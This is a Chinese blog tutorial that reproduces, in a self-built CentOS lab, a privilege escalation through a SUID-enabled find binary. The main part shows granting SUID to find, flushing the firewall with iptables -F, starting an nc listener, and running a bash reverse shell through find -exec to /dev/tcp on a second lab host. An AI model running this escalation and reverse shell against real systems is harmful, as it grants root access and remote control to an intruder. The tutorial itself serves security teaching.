centos利用find提权反弹shell

需要说明的是利用find命令进行提权的方式已经不存在了,因为Linux默认不会为find命令授予suid权限,这里只是刻意的制造出了一种存在提权的环境

首先我们先介绍一下find命令,find命令主要用来在Linux中查找文件使用,它可以进行最基础的打印操作,还可以根据文件的名称、类型、事假戳、大小、权限等来查找指定的文件。

利用find反弹shell实现提权主要依靠的就是find命令如果有suid的权限,那么在执行find命令的一瞬间会拥有root权限,又因为find命令可以使用执行的操作,所以有很大的危害。

那么我们现在就复现一下:

(1)首先可以查看一下find命令的权限

bash 复制代码
ls -al /usr/bin/find

可以看到并没有suid(s)权限

(2)那么我现在手动的为find授予suid的权限

bash 复制代码
chmod  u+s /usr/bin/find

我们再查看find的权限就会发现它已经有了s权限

(3)因为我现在还是在root用户下,始终是root权限,无法观察find命令提权的过程,我现在切换到一个普通的用户下:

bash 复制代码
su user1

(4)那么现在就可以测试一下find命令执行时会不会提升到root权限

bash 复制代码
find /etc/passwd -exec whoami \;

可以看到这里和我设想的一样,在find命令执行的一瞬间是root权限

(5)那么这是我在另一台centos对12345端口进行监听

bash 复制代码
nc -lvvp 12345

(5)这时我尝试在centos1上执行操作,尝试进行反弹shell

bash 复制代码
find  /etc/passwd -exec bash -ip >&/dev/tcp/192.168.159.201/12345 0>&1 \;

可以看到并没有成功,难道因为我们没有到192.168.159.201的路由吗,我们可是一个网段呀,那我就用ping命令看看

很明显可以ping通呀,那为什么在尝试执行时会报错说没有路由呢

(6)我想会不会是因为防火墙的原因,于是我在两台主机上都清除了防火墙的规则

bash 复制代码
iptables -F

(7)然后再次尝试

可以看到centos1成功的利用find的这样一个漏洞反弹到了centos2的shell

(8)我们可以查看一下ip地址看看是否为centos1

可以看到这就是我的centos1设备的ip地址

到这里使用find来实现反弹shell的漏洞就复现完成了

注:给find增加suid增加只是为了实验,记着做完实验后去除find的suid权限

bash 复制代码
chmod u-s /usr/bin/find
相关推荐
Peter_chq16 分钟前
【操作系统】基于环形队列的生产消费模型
linux·c语言·开发语言·c++·后端
一坨阿亮1 小时前
Linux 使用中的问题
linux·运维
hikktn2 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析
c语言·安全·rust
dsywws2 小时前
Linux学习笔记之vim入门
linux·笔记·学习
幺零九零零3 小时前
【C++】socket套接字编程
linux·服务器·网络·c++
wclass-zhengge3 小时前
Docker篇(Docker Compose)
运维·docker·容器
李启柱3 小时前
项目开发流程规范文档
运维·软件构建·个人开发·设计规范
23zhgjx-NanKon4 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon4 小时前
华为eNSP:mux-vlan
网络·安全·华为
昔我往昔4 小时前
阿里云文本内容安全处理
安全·阿里云·云计算